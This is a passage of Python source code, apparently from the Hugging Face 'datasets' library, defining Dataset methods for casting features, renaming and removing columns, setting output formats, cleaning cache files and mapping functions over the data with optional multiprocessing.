num_proc (`Optional[int]`, default `None`): Number of processes for multiprocessing. By default it doesn't use multiprocessing. 
""" if sorted(features) != sorted(self._data.column_names): raise ValueError( f"The columns in features ({list(features)}) must be identical " f"as the columns in the dataset: {self._data.column_names}" ) type = features.type schema = pa.schema({col_name: type[col_name].type for col_name in self._data.column_names}) dataset = self.with_format("arrow") # capture the PyArrow version here to make the lambda serializable on Windows is_pyarrow_at_least_4 = config.PYARROW_VERSION.major >= 4 dataset = dataset.map( lambda t: t.cast(schema) if is_pyarrow_at_least_4 else cast_with_sliced_list_support(t, schema), batched=True, batch_size=batch_size, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, num_proc=num_proc, features=features, desc="Casting the dataset", ) self._data = dataset._data self._info = dataset._info self._fingerprint = dataset._fingerprint def cast( self, features: Features, batch_size: Optional[int] = 10_000, keep_in_memory: bool = False, load_from_cache_file: bool = True, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 10_000, num_proc: Optional[int] = None, ) -> "Dataset": """ Cast the dataset to a new set of features. Args: features (:class:`datasets.Features`): New features to cast the dataset to. The name of the fields in the features must match the current column names. The type of the data must also be convertible from one type to the other. For non-trivial conversion, e.g. string <-> ClassLabel you should use :func:`map` to update the Dataset. batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to cast. `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to cast. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. load_from_cache_file (:obj:`bool`, default `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. num_proc (`Optional[int]`, default `None`): Number of processes for multiprocessing. By default it doesn't use multiprocessing. Returns: :class:`Dataset`: A copy of the dataset with casted features. 
""" if sorted(features) != sorted(self._data.column_names): raise ValueError( f"The columns in features ({list(features)}) must be identical " f"as the columns in the dataset: {self._data.column_names}" ) type = features.type schema = pa.schema({col_name: type[col_name].type for col_name in self._data.column_names}) format = self.format dataset = self.with_format("arrow") # capture the PyArrow version here to make the lambda serializable on Windows is_pyarrow_at_least_4 = config.PYARROW_VERSION.major >= 4 dataset = dataset.map( lambda t: t.cast(schema) if is_pyarrow_at_least_4 else cast_with_sliced_list_support(t, schema), batched=True, batch_size=batch_size, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, num_proc=num_proc, features=features, desc="Casting the dataset", ) dataset = dataset.with_format(**format) return dataset @fingerprint_transform(inplace=False) def cast_column(self, column: str, feature: FeatureType, new_fingerprint: str) -> "Dataset": """Cast column to feature for decoding. Args: column (:obj:`str`): Column name. feature (:class:`Feature`): Target feature. Returns: :class:`Dataset` """ if hasattr(feature, "decode_example"): dataset = copy.deepcopy(self) dataset.features[column] = feature dataset._fingerprint = new_fingerprint return dataset else: features = self.features.copy() features[column] = feature return self.cast(features) @deprecated(help_message="Use Dataset.remove_columns instead.") @fingerprint_transform(inplace=True) def remove_columns_(self, column_names: Union[str, List[str]]): """In-place version of :meth:`Dataset.remove_columns`. .. deprecated:: 1.4.0 Use :meth:`Dataset.remove_columns` instead. Args: column_names (:obj:`Union[str, List[str]]`): Name of the column(s) to remove. """ if isinstance(column_names, str): column_names = [column_names] for column_name in column_names: if column_name not in self._data.column_names: raise ValueError( f"Column name {column_name} not in the dataset. " f"Current columns in the dataset: {self._data.column_names}" ) for column_name in column_names: del self._info.features[column_name] self._data = self._data.drop(column_names) self._data = update_metadata_with_features(self._data, self.features) @transmit_tasks @fingerprint_transform(inplace=False) def remove_columns(self, column_names: Union[str, List[str]], new_fingerprint) -> "Dataset": """ Remove one or several column(s) in the dataset and the features associated to them. You can also remove a column using :func:`Dataset.map` with `remove_columns` but the present method is in-place (doesn't copy the data to a new dataset) and is thus faster. Args: column_names (:obj:`Union[str, List[str]]`): Name of the column(s) to remove. new_fingerprint Returns: :class:`Dataset`: A copy of the dataset object without the columns to remove. """ dataset = copy.deepcopy(self) if isinstance(column_names, str): column_names = [column_names] for column_name in column_names: if column_name not in dataset._data.column_names: raise ValueError( f"Column name {column_name} not in the dataset. 
" f"Current columns in the dataset: {dataset._data.column_names}" ) for column_name in column_names: del dataset._info.features[column_name] dataset._data = dataset._data.drop(column_names) dataset._data = update_metadata_with_features(dataset._data, dataset.features) dataset._fingerprint = new_fingerprint return dataset @deprecated(help_message="Use Dataset.rename_column instead.") @fingerprint_transform(inplace=True) def rename_column_(self, original_column_name: str, new_column_name: str): """In-place version of :meth:`Dataset.rename_column`. .. deprecated:: 1.4.0 Use :meth:`Dataset.rename_column` instead. Args: original_column_name (:obj:`str`): Name of the column to rename. new_column_name (:obj:`str`): New name for the column. """ if original_column_name not in self._data.column_names: raise ValueError( f"Original column name {original_column_name} not in the dataset. " f"Current columns in the dataset: {self._data.column_names}" ) if new_column_name in self._data.column_names: raise ValueError( f"New column name {original_column_name} already in the dataset. " f"Please choose a column name which is not already in the dataset. " f"Current columns in the dataset: {self._data.column_names}" ) if not new_column_name: raise ValueError("New column name is empty.") def rename(columns): return [new_column_name if col == original_column_name else col for col in columns] new_column_names = rename(self._data.column_names) if self._format_columns is not None: self._format_columns = rename(self._format_columns) self._info.features = Features( { new_column_name if col == original_column_name else col: feature for col, feature in self._info.features.items() } ) self._data = self._data.rename_columns(new_column_names) self._data = update_metadata_with_features(self._data, self.features) @transmit_tasks @fingerprint_transform(inplace=False) def rename_column(self, original_column_name: str, new_column_name: str, new_fingerprint) -> "Dataset": """ Rename a column in the dataset, and move the features associated to the original column under the new column name. Args: original_column_name (:obj:`str`): Name of the column to rename. new_column_name (:obj:`str`): New name for the column. new_fingerprint Returns: :class:`Dataset`: A copy of the dataset with a renamed column. """ dataset = copy.deepcopy(self) if original_column_name not in dataset._data.column_names: raise ValueError( f"Original column name {original_column_name} not in the dataset. " f"Current columns in the dataset: {dataset._data.column_names}" ) if new_column_name in dataset._data.column_names: raise ValueError( f"New column name {original_column_name} already in the dataset. " f"Please choose a column name which is not already in the dataset. 
" f"Current columns in the dataset: {dataset._data.column_names}" ) if not new_column_name: raise ValueError("New column name is empty.") def rename(columns): return [new_column_name if col == original_column_name else col for col in columns] new_column_names = rename(self._data.column_names) if self._format_columns is not None: dataset._format_columns = rename(self._format_columns) dataset._info.features = Features( { new_column_name if col == original_column_name else col: feature for col, feature in self._info.features.items() } ) dataset._data = dataset._data.rename_columns(new_column_names) dataset._data = update_metadata_with_features(dataset._data, dataset.features) dataset._fingerprint = new_fingerprint return dataset @transmit_tasks @fingerprint_transform(inplace=False) def rename_columns(self, column_mapping: Dict[str, str], new_fingerprint) -> "Dataset": """ Rename several columns in the dataset, and move the features associated to the original columns under the new column names. Args: column_mapping (:obj:`Dict[str, str]`): A mapping of columns to rename to their new names Returns: :class:`Dataset`: A copy of the dataset with renamed columns """ dataset = copy.deepcopy(self) extra_columns = set(column_mapping.keys()) - set(dataset.column_names) if extra_columns: raise ValueError( f"Original column names {extra_columns} not in the dataset. " f"Current columns in the dataset: {dataset._data.column_names}" ) number_of_duplicates_in_new_columns = len(column_mapping.values()) - len(set(column_mapping.values())) if number_of_duplicates_in_new_columns != 0: raise ValueError( "New column names must all be different, but this column mapping " f"has {number_of_duplicates_in_new_columns} duplicates" ) empty_new_columns = [new_col for new_col in column_mapping.values() if not new_col] if empty_new_columns: raise ValueError(f"New column names {empty_new_columns} are empty.") def rename(columns): return [column_mapping[col] if col in column_mapping else col for col in columns] new_column_names = rename(self._data.column_names) if self._format_columns is not None: dataset._format_columns = rename(self._format_columns) dataset._info.features = Features( { column_mapping[col] if col in column_mapping else col: feature for col, feature in (self._info.features or {}).items() } ) dataset._data = dataset._data.rename_columns(new_column_names) dataset._data = update_metadata_with_features(dataset._data, dataset.features) dataset._fingerprint = new_fingerprint return dataset def __len__(self): """Number of rows in the dataset.""" return self.num_rows def __iter__(self): """Iterate through the examples. If a formatting is set with :meth:`Dataset.set_format` rows will be returned with the selected format. """ for index in range(self.num_rows): yield self._getitem( index, decoded=False, ) def __repr__(self): return f"Dataset({{\n features: {list(self.features.keys())},\n num_rows: {self.num_rows}\n}})" @property def format(self): return { "type": self._format_type, "format_kwargs": self._format_kwargs, "columns": self.column_names if self._format_columns is None else self._format_columns, "output_all_columns": self._output_all_columns, } @contextlib.contextmanager def formatted_as( self, type: Optional[str] = None, columns: Optional[List] = None, output_all_columns: bool = False, **format_kwargs, ): """To be used in a `with` statement. Set __getitem__ return format (type and columns). 
Args: type (Optional ``str``): output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas', 'arrow'] None means __getitem__ returns python objects (default) columns (Optional ``List[str]``): columns to format in the output None means __getitem__ returns all columns (default) output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`. """ old_format_type = self._format_type old_format_kwargs = self._format_kwargs old_format_columns = self._format_columns old_output_all_columns = self._output_all_columns try: self.set_format(type, columns, output_all_columns, **format_kwargs) yield finally: self.set_format(old_format_type, old_format_columns, old_output_all_columns, **old_format_kwargs) @fingerprint_transform(inplace=True) def set_format( self, type: Optional[str] = None, columns: Optional[List] = None, output_all_columns: bool = False, **format_kwargs, ): """Set __getitem__ return format (type and columns). The data formatting is applied on-the-fly. The format ``type`` (for example "numpy") is used to format batches when using __getitem__. It's also possible to use custom transforms for formatting using :func:`datasets.Dataset.set_transform`. Args: type (Optional ``str``): Either output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas', 'arrow']. None means __getitem__ returns python objects (default) columns (Optional ``List[str]``): columns to format in the output. None means __getitem__ returns all columns (default). output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`. It is possible to call ``map`` after calling ``set_format``. Since ``map`` may add new columns, then the list of formatted columns gets updated. In this case, if you apply ``map`` on a dataset to add a new column, then this column will be formatted: new formatted columns = (all columns - previously unformatted columns) """ format_kwargs.update(format_kwargs.pop("format_kwargs", {})) # allow to use self.set_format(self.format) # Check that the format_type and format_kwargs are valid and make it possible to have a Formatter type = get_format_type_from_alias(type) _ = get_formatter(type, features=self.features, **format_kwargs) # Check filter column if isinstance(columns, str): columns = [columns] if isinstance(columns, tuple): columns = list(columns) if columns is not None and any(col not in self._data.column_names for col in columns): raise ValueError( f"Columns {list(filter(lambda col: col not in self._data.column_names, columns))} not in the dataset. 
Current columns in the dataset: {self._data.column_names}" ) if columns is not None: columns = columns.copy() # Ensures modifications made to the list after this call don't cause bugs self._format_type = type self._format_kwargs = format_kwargs self._format_columns = columns self._output_all_columns = output_all_columns logger.debug( "Set __getitem__(key) output type to %s for %s columns " " (when key is int or slice) and %s output other (un-formatted) columns.", "python objects" if type is None else type, "no" if columns is None else str(columns), "do" if output_all_columns else "don't", ) def reset_format(self): """Reset __getitem__ return format to python objects and all columns. Same as ``self.set_format()`` """ self.set_format() def set_transform( self, transform: Optional[Callable], columns: Optional[List] = None, output_all_columns: bool = False, ): """Set __getitem__ return format using this transform. The transform is applied on-the-fly on batches when __getitem__ is called. As :func:`datasets.Dataset.set_format`, this can be reset using :func:`datasets.Dataset.reset_format` Args: transform (Optional ``Callable``): user-defined formatting transform, replaces the format defined by :func:`datasets.Dataset.set_format` A formatting function is a callable that takes a batch (as a dict) as input and returns a batch. This function is applied right before returning the objects in __getitem__. columns (Optional ``List[str]``): columns to format in the output If specified, then the input batch of the transform only contains those columns. output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) If set to True, then the other un-formatted columns are kept with the output of the transform. """ self.set_format("custom", columns=columns, output_all_columns=output_all_columns, transform=transform) def with_format( self, type: Optional[str] = None, columns: Optional[List] = None, output_all_columns: bool = False, **format_kwargs, ): """Set __getitem__ return format (type and columns). The data formatting is applied on-the-fly. The format ``type`` (for example "numpy") is used to format batches when using __getitem__. It's also possible to use custom transforms for formatting using :func:`datasets.Dataset.with_transform`. Contrary to :func:`datasets.Dataset.set_format`, ``with_format`` returns a new Dataset object. Args: type (Optional ``str``): Either output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas', 'arrow']. None means __getitem__ returns python objects (default) columns (Optional ``List[str]``): columns to format in the output None means __getitem__ returns all columns (default) output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`. """ dataset = copy.deepcopy(self) dataset.set_format(type=type, columns=columns, output_all_columns=output_all_columns, **format_kwargs) return dataset def with_transform( self, transform: Optional[Callable], columns: Optional[List] = None, output_all_columns: bool = False, ): """Set __getitem__ return format using this transform. The transform is applied on-the-fly on batches when __getitem__ is called. As :func:`datasets.Dataset.set_format`, this can be reset using :func:`datasets.Dataset.reset_format`. 
Contrary to :func:`datasets.Dataset.set_transform`, ``with_transform`` returns a new Dataset object. Args: transform (Optional ``Callable``): user-defined formatting transform, replaces the format defined by :func:`datasets.Dataset.set_format` A formatting function is a callable that takes a batch (as a dict) as input and returns a batch. This function is applied right before returning the objects in __getitem__. columns (Optional ``List[str]``): columns to format in the output If specified, then the input batch of the transform only contains those columns. output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) If set to True, then the other un-formatted columns are kept with the output of the transform. """ dataset = copy.deepcopy(self) dataset.set_transform(transform=transform, columns=columns, output_all_columns=output_all_columns) return dataset def prepare_for_task(self, task: Union[str, TaskTemplate], id: int = 0) -> "Dataset": """Prepare a dataset for the given task by casting the dataset's :class:`Features` to standardized column names and types as detailed in :py:mod:`datasets.tasks`. Casts :attr:`datasets.DatasetInfo.features` according to a task-specific schema. Intended for single-use only, so all task templates are removed from :attr:`datasets.DatasetInfo.task_templates` after casting. Args: task (:obj:`Union[str, TaskTemplate]`): The task to prepare the dataset for during training and evaluation. If :obj:`str`, supported tasks include: - :obj:`"text-classification"` - :obj:`"question-answering"` If :obj:`TaskTemplate`, must be one of the task templates in :py:mod:`datasets.tasks`. id (:obj:`int`, default `0`): The id required to unambiguously identify the task template when multiple task templates of the same type are supported. """ # TODO(lewtun): Add support for casting nested features like answers.text and answers.answer_start in SQuAD if isinstance(task, str): tasks = [template.task for template in (self.info.task_templates or [])] compatible_templates = [template for template in (self.info.task_templates or []) if template.task == task] if not compatible_templates: raise ValueError( f"Task {task} is not compatible with this dataset! Available tasks: {list(unique_values(tasks))}" ) if not 0 <= id < len(compatible_templates): templates_list_str = "\n".join( f"- `{idx}` for task {template}" for idx, template in enumerate(compatible_templates) ) raise ValueError( f"Id {id} for task {task} is not in a valid range. Supported ids:\n{templates_list_str}" ) template = compatible_templates[id] elif isinstance(task, TaskTemplate): template = task else: raise ValueError( f"Expected a `str` or `datasets.TaskTemplate` object but got task {task} with type {type(task)}." 
) template = template.align_with_features(self.info.features) column_mapping = template.column_mapping columns_to_drop = [column for column in self.column_names if column not in column_mapping] dataset = self.remove_columns(columns_to_drop) dataset = dataset.rename_columns(column_mapping) # We found a template so now flush `DatasetInfo` to skip the template update in `DatasetInfo.__post_init__` dataset.info.task_templates = None dataset = dataset.cast(features=template.features) return dataset def _getitem(self, key: Union[int, slice, str], decoded: bool = True, **kwargs) -> Union[Dict, List]: """ Can be used to index columns (by string names) or rows (by integer index, slices, or iter of indices or bools) """ format_type = kwargs["format_type"] if "format_type" in kwargs else self._format_type format_columns = kwargs["format_columns"] if "format_columns" in kwargs else self._format_columns output_all_columns = ( kwargs["output_all_columns"] if "output_all_columns" in kwargs else self._output_all_columns ) format_kwargs = kwargs["format_kwargs"] if "format_kwargs" in kwargs else self._format_kwargs format_kwargs = format_kwargs if format_kwargs is not None else {} formatter = get_formatter(format_type, features=self.features, decoded=decoded, **format_kwargs) pa_subtable = query_table(self._data, key, indices=self._indices if self._indices is not None else None) formatted_output = format_table( pa_subtable, key, formatter=formatter, format_columns=format_columns, output_all_columns=output_all_columns ) return formatted_output @overload def __getitem__(self, key: Union[int, slice, Iterable[int]]) -> Dict: # noqa: F811 ... @overload def __getitem__(self, key: str) -> List: # noqa: F811 ... def __getitem__(self, key): # noqa: F811 """Can be used to index columns (by string names) or rows (by integer index or iterable of indices or bools).""" return self._getitem( key, ) def cleanup_cache_files(self) -> int: """Clean up all cache files in the dataset cache directory, excepted the currently used cache file if there is one. Be careful when running this command that no other process is currently using other cache files. Returns: :obj:`int`: Number of removed files. 
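        Example (illustrative; assumes ``ds`` is a cached :class:`Dataset` with stale ``cache-*.arrow`` files)::

            n_removed = ds.cleanup_cache_files()
            print(f"removed {n_removed} cache file(s)")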
""" current_cache_files = [os.path.abspath(cache_file["filename"]) for cache_file in self.cache_files] if not current_cache_files: return 0 cache_directory = os.path.dirname(current_cache_files[0]) logger.info(f"Listing files in {cache_directory}") files: List[str] = os.listdir(cache_directory) files_to_remove = [] for f_name in files: full_name = os.path.abspath(os.path.join(cache_directory, f_name)) if f_name.startswith("cache-") and f_name.endswith(".arrow"): if full_name in current_cache_files: logger.info(f"Keeping currently used cache file at {full_name}") continue files_to_remove.append(full_name) for file_path in files_to_remove: logger.info(f"Removing {file_path}") os.remove(file_path) return len(files_to_remove) def _get_cache_file_path(self, fingerprint): if is_caching_enabled() and self.cache_files: cache_file_name = "cache-" + fingerprint + ".arrow" cache_directory = os.path.dirname(self.cache_files[0]["filename"]) else: cache_file_name = "cache-" + generate_random_fingerprint() + ".arrow" cache_directory = get_temporary_cache_files_directory() cache_file_path = os.path.join(cache_directory, cache_file_name) return cache_file_path def map( self, function: Optional[Callable] = None, with_indices: bool = False, with_rank: bool = False, input_columns: Optional[Union[str, List[str]]] = None, batched: bool = False, batch_size: Optional[int] = 1000, drop_last_batch: bool = False, remove_columns: Optional[Union[str, List[str]]] = None, keep_in_memory: bool = False, load_from_cache_file: bool = None, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, features: Optional[Features] = None, disable_nullable: bool = False, fn_kwargs: Optional[dict] = None, num_proc: Optional[int] = None, suffix_template: str = "_{rank:05d}_of_{num_proc:05d}", new_fingerprint: Optional[str] = None, desc: Optional[str] = None, ) -> "Dataset": """Apply a function to all the elements in the table (individually or in batches) and update the table (if function does update examples). Args: function (:obj:`Callable`): Function with one of the following signatures: - `function(example: Union[Dict, Any]) -> Union[Dict, Any]` if `batched=False` and `with_indices=False` and `with_rank=False` - `function(example: Union[Dict, Any], *extra_args) -> Union[Dict, Any]` if `batched=False` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) - `function(batch: Union[Dict[List], List[Any]]) -> Union[Dict, Any]` if `batched=True` and `with_indices=False` and `with_rank=False` - `function(batch: Union[Dict[List], List[Any]], *extra_args) -> Union[Dict, Any]` if `batched=True` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) If no function is provided, default to identity function: ``lambda x: x``. with_indices (:obj:`bool`, default `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx[, rank]): ...`. with_rank (:obj:`bool`, default `False`): Provide process rank to `function`. Note that in this case the signature of `function` should be `def function(example[, idx], rank): ...`. input_columns (`Optional[Union[str, List[str]]]`, default `None`): The columns to be passed into `function` as positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument. batched (:obj:`bool`, default `False`): Provide batch of examples to `function`. 
batch_size (`Optional[int]`, default `1000`): Number of examples per batch provided to `function` if `batched=True` `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to `function`. drop_last_batch (:obj:`bool`, default `False`): Whether a last batch smaller than the batch_size should be dropped instead of being processed by the function. remove_columns (`Optional[Union[str, List[str]]]`, default `None`): Remove a selection of columns while doing the mapping. Columns will be removed before updating the examples with the output of `function`, i.e. if `function` is adding columns with names in `remove_columns`, these columns will be kept. keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. features (`Optional[datasets.Features]`, default `None`): Use a specific Features to store the cache file instead of the automatically generated one. disable_nullable (:obj:`bool`, default `False`): Disallow null values in the table. fn_kwargs (`Optional[Dict]`, default `None`): Keyword arguments to be passed to `function`. num_proc (`Optional[int]`, default `None`): Max number of processes when generating cache. Already cached shards are loaded sequentially suffix_template (:obj:`str`): If cache_file_name is specified, then this suffix will be added at the end of the base name of each: defaults to "_{rank:05d}_of_{num_proc:05d}". For example, if cache_file_name is "processed.arrow", then for rank=1 and num_proc=4, the resulting file would be "processed_00001_of_00004.arrow" for the default suffix. new_fingerprint (`Optional[str]`, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments. desc (`Optional[str]`, defaults to `None`): Meaningful description to be displayed alongside with the progress bar while mapping examples. """ if keep_in_memory and cache_file_name is not None: raise ValueError("Please use either `keep_in_memory` or `cache_file_name` but not both.") if num_proc is not None and num_proc <= 0: raise ValueError("num_proc must be an integer > 0.") # If the array is empty we do nothing if len(self) == 0: return self if function is None: function = lambda x: x # noqa: E731 def decorate(f): """ Decorate the mapped function, so that its first argument is wrapped with a LazyDict to be used internally but a standard dictionary is returned at the end of the mapping. 
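            If ``f`` returns a ``LazyDict``, only its plain ``.data`` dict is passed on, so callers never receive a ``LazyDict``.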
""" @wraps(f) def decorated(item, *args, **kwargs): # Decorate first arg with LazyDict (either Example or Batch) decorated_item = ( Example(item, features=self.features) if not batched else Batch(item, features=self.features) ) # Use the LazyDict internally, while mapping the function result = f(decorated_item, *args, **kwargs) # Return a standard dict return result.data if isinstance(result, LazyDict) else result return decorated function = decorate(function) if not self._format_type and not input_columns else function if isinstance(input_columns, str): input_columns = [input_columns] if input_columns is not None: for input_column in input_columns: if input_column not in self._data.column_names: raise ValueError( f"Input column {input_column} not in the dataset. Current columns in the dataset: {self._data.column_names}" ) if isinstance(remove_columns, str): remove_columns = [remove_columns] if remove_columns is not None and any(col not in self._data.column_names for col in remove_columns): raise ValueError( f"Column to remove {list(filter(lambda col: col not in self._data.column_names, remove_columns))} not in the dataset. Current columns in the dataset: {self._data.column_names}" ) load_from_cache_file = load_from_cache_file if load_from_cache_file is not None else is_caching_enabled() if fn_kwargs is None: fn_kwargs = {} if num_proc is not None and num_proc > len(self): num_proc = len(self) logger.warning( f"num_proc must be <= {len(self)}. Reducing num_proc to {num_proc} for dataset of size {len(self)}." ) disable_tqdm = bool(logging.get_verbosity() == logging.NOTSET) or not utils.is_progress_bar_enabled() if num_proc is None or num_proc == 1: return self._map_single( function=function, with_indices=with_indices, with_rank=with_rank, input_columns=input_columns, batched=batched, batch_size=batch_size, drop_last_batch=drop_last_batch, remove_columns=remove_columns, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, features=features, disable_nullable=disable_nullable, fn_kwargs=fn_kwargs, new_fingerprint=new_fingerprint, disable_tqdm=disable_tqdm, desc=desc, ) else: def format_cache_file_name(cache_file_name, rank): sep = cache_file_name.rindex(".") base_name, extension = cache_file_name[:sep], cache_file_name[sep:] cache_file_name = base_name + suffix_template.format(rank=rank, num_proc=num_proc) + extension logger.info(f"Process #{rank} will write at {cache_file_name}") return cache_file_name def format_new_fingerprint(new_fingerprint, rank): return new_fingerprint + suffix_template.format(rank=rank, num_proc=num_proc) prev_env = deepcopy(os.environ) # check if parallelism if off # from https://github.com/huggingface/tokenizers/blob/bb668bc439dc34389b71dbb8ce0c597f15707b53/tokenizers/src/utils/parallelism.rs#L22 if prev_env.get("TOKENIZERS_PARALLELISM", "false").lower() not in ( "", "off", "false", "f", "no", "n", "0", ): logger.warning("Setting TOKENIZERS_PARALLELISM=false for forked processes.") os.environ["TOKENIZERS_PARALLELISM"] = "false" initargs, initializer = None, None if not disable_tqdm: initargs, initializer = (RLock(),), tqdm.set_lock shards = [ self.shard(num_shards=num_proc, index=rank, contiguous=True, keep_in_memory=keep_in_memory) for rank in range(num_proc) ] kwds_per_shard = [ dict( self=shards[rank], function=function, with_indices=with_indices, with_rank=with_rank, input_columns=input_columns, batched=batched, batch_size=batch_size, drop_last_batch=drop_last_batch, 
remove_columns=remove_columns, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=format_cache_file_name(cache_file_name, rank) if cache_file_name is not None else None, writer_batch_size=writer_batch_size, features=features.copy() if features is not None else None, disable_nullable=disable_nullable, fn_kwargs=fn_kwargs, rank=rank, offset=sum(len(s) for s in shards[:rank]), disable_tqdm=disable_tqdm, new_fingerprint=format_new_fingerprint(new_fingerprint, rank) if new_fingerprint is not None else None, desc=desc, ) for rank in range(num_proc) ] # We search for already cached shards def catch_non_existent_error(func, kwargs): try: return func(**kwargs) except NonExistentDatasetError: return None transformed_shards = [ catch_non_existent_error(self.__class__._map_single, dict(cache_only=True, **kwds)) for kwds in kwds_per_shard ] # We try to create a pool with as many workers as dataset not yet cached. nb_of_missing_shards = transformed_shards.count(None) if nb_of_missing_shards > 0: with Pool(nb_of_missing_shards, initargs=initargs, initializer=initializer) as pool: os.environ = prev_env logger.info(f"Spawning {num_proc} processes") results = { i: pool.apply_async(self.__class__._map_single, kwds=kwds) for i, (kwds, cached_shard) in enumerate(zip(kwds_per_shard, transformed_shards)) if cached_shard is None } assert ( len(results) == nb_of_missing_shards ), "The number of missing cached shards needs to correspond to the number of `_map_single` we're running" for index, async_result in results.items(): transformed_shards[index] = async_result.get() assert ( transformed_shards.count(None) == 0 ), "All shards have to be defined Datasets, none should still be missing." logger.info(f"Concatenating {num_proc} shards") result = concatenate_datasets(transformed_shards) if new_fingerprint is not None: result._fingerprint = new_fingerprint return result @transmit_tasks @transmit_format @fingerprint_transform( inplace=False, ignore_kwargs=["load_from_cache_file", "cache_file_name", "disable_tqdm", "desc", "cache_only"] ) def _map_single( self, function: Optional[Callable] = None, with_indices: bool = False, with_rank: bool = False, input_columns: Optional[List[str]] = None, batched: bool = False, batch_size: Optional[int] = 1000, drop_last_batch: bool = False, remove_columns: Optional[List[str]] = None, keep_in_memory: bool = False, load_from_cache_file: bool = None, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, features: Optional[Features] = None, disable_nullable: bool = False, fn_kwargs: Optional[dict] = None, new_fingerprint: Optional[str] = None, rank: Optional[int] = None, offset: int = 0, disable_tqdm: bool = False, desc: Optional[str] = None, cache_only: bool = False, ) -> "Dataset": """Apply a function to all the elements in the table (individually or in batches) and update the table (if function does update examples). 
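        (Internal worker: :func:`Dataset.map` calls this directly when ``num_proc`` is ``None`` or ``1``, and once per shard when multiprocessing.)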
Args: function (:obj:`Callable`): with one of the following signature: - `function(example: Union[Dict, Any]) -> Union[Dict, Any]` if `batched=False` and `with_indices=False` and `with_rank=False` - `function(example: Union[Dict, Any], *extra_args) -> Union[Dict, Any]` if `batched=False` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) - `function(batch: Union[Dict[List], List[Any]]) -> Union[Dict, Any]` if `batched=True` and `with_indices=False` and `with_rank=False` - `function(batch: Union[Dict[List], List[Any]], *extra_args) -> Union[Dict, Any]` if `batched=True` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) If no function is provided, default to identity function: lambda x: x with_indices (:obj:`bool`, defaults to `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx[, rank]): ...`. with_rank (:obj:`bool`, default `False`): Provide process rank to `function`. Note that in this case the signature of `function` should be `def function(example[, idx], rank): ...`. input_columns (`Optional[List[str]]`, defaults to `None`): The columns to be passed into `function` as positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument. batched (:obj:`bool`, defaults to `False`): Provide batch of examples to `function` batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to `function` if `batched=True` `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to `function` drop_last_batch (:obj:`bool`, default: `False`): Whether a last batch smaller than the batch_size should be dropped instead of being processed by the function. remove_columns (`Optional[List[str]]`, defaults to `None`): Remove a selection of columns while doing the mapping. Columns will be removed before updating the examples with the output of `function`, i.e. if `function` is adding columns with names in `remove_columns`, these columns will be kept. keep_in_memory (:obj:`bool`, defaults to `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, defaults to `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. features (`Optional[datasets.Features]`, defaults to `None`): Use a specific Features to store the cache file instead of the automatically generated one. disable_nullable (:obj:`bool`, defaults to `False`): Disallow null values in the table. fn_kwargs (`Optional[Dict]`, defaults to `None`): Keyword arguments to be passed to `function` new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform. 
